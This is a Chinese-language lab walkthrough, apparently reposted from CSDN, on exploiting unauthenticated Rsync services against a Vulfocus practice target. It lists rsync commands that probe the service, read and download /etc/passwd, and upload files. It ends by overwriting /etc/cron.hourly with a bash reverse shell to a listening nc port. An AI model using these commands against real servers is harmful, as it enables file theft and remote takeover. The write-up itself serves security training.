码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 应用协议安全:Rsync-common 未授权访问.


    应用协议安全:Rsync-common 未授权访问.

    Rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。


    目录:

    应用协议安全:Rsync-common 未授权访问.

    Rsync-common 未授权访问

    靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客

    漏洞的测试:

    第一步:测试漏洞有没有存在.

    第二步:测试 读取文件.

    第三步:测试 下载文件.

    第四步:测试 上传文件.

    第五步:测试 反弹 shell


    Rsync-common 未授权访问

    靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客


    漏洞的测试:

    第一步:测试漏洞有没有存在.

    1. rsync rsync://172.16.10.130:10890
    2. rsync rsync://测试 IP 地址:端口


    第二步:测试 读取文件.

    rsync rsync://172.16.10.130:55803/src/


    第三步:测试 下载文件.

    1. rsync rsync://172.16.10.130:10890/src/etc/passwd ./
    2. rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下


    第四步:测试 上传文件.

    1. rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd
    2. rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/
    rsync rsync://172.16.10.130:10890/src/tmp/passwd      #读取的文件.


    第五步:测试 反弹 shell

    前提条件先了解:Crontab是一种运行于 Linux系统 下的定时任务管理器。它可以在指定时间执行特定的命令或脚本,并且可以设置重复周期.

    1. 直接下载 crontab 文件:
    2. rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt

    ​


    所以知道他17分钟后执行这个文件,我们就可以创建一个反弹shell的文件来替换他.


    1. touch bgxg #创建新文件.
    2. vim bgxg #编辑文件.
    3. #添加在文件中的内容
    4. /bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1
    5. chmod +x bgxg #添加权限.

    ​

    ​


    1. 再进行上传bgxg文件,把cron.hourly替换了
    2. rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly

    ​

    ​


    1. 监听这个端口就等着反弹就好.(由于靶场时间比较短,就不等反弹时间了)
    2. nc -lvvp 5566

    ​

       

       

        

     学习链接:第57天:服务攻防-应用协议_Rsync_SSH_RDP_FTP_漏洞批扫_口令猜解_哔哩哔哩_bilibili

  • 相关阅读:
    行业内口碑好值得信赖的短网址,让你不再选择恐惧
    15. 三数之和
    小鹏汽车的“未来”故事有点性感
    优化大型机床装配调度:项目管理软件的应用方法
    昨日阅读量898
    c++入门
    华为OD机考:0039-0040:url地址、序列描述
    第八章 配置命名空间(三)
    链路聚合 VRRP
    ATTENTION, LEARN TO SOLVE ROUTING PROBLEMS!
  • 原文地址:https://blog.csdn.net/weixin_54977781/article/details/134426642
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号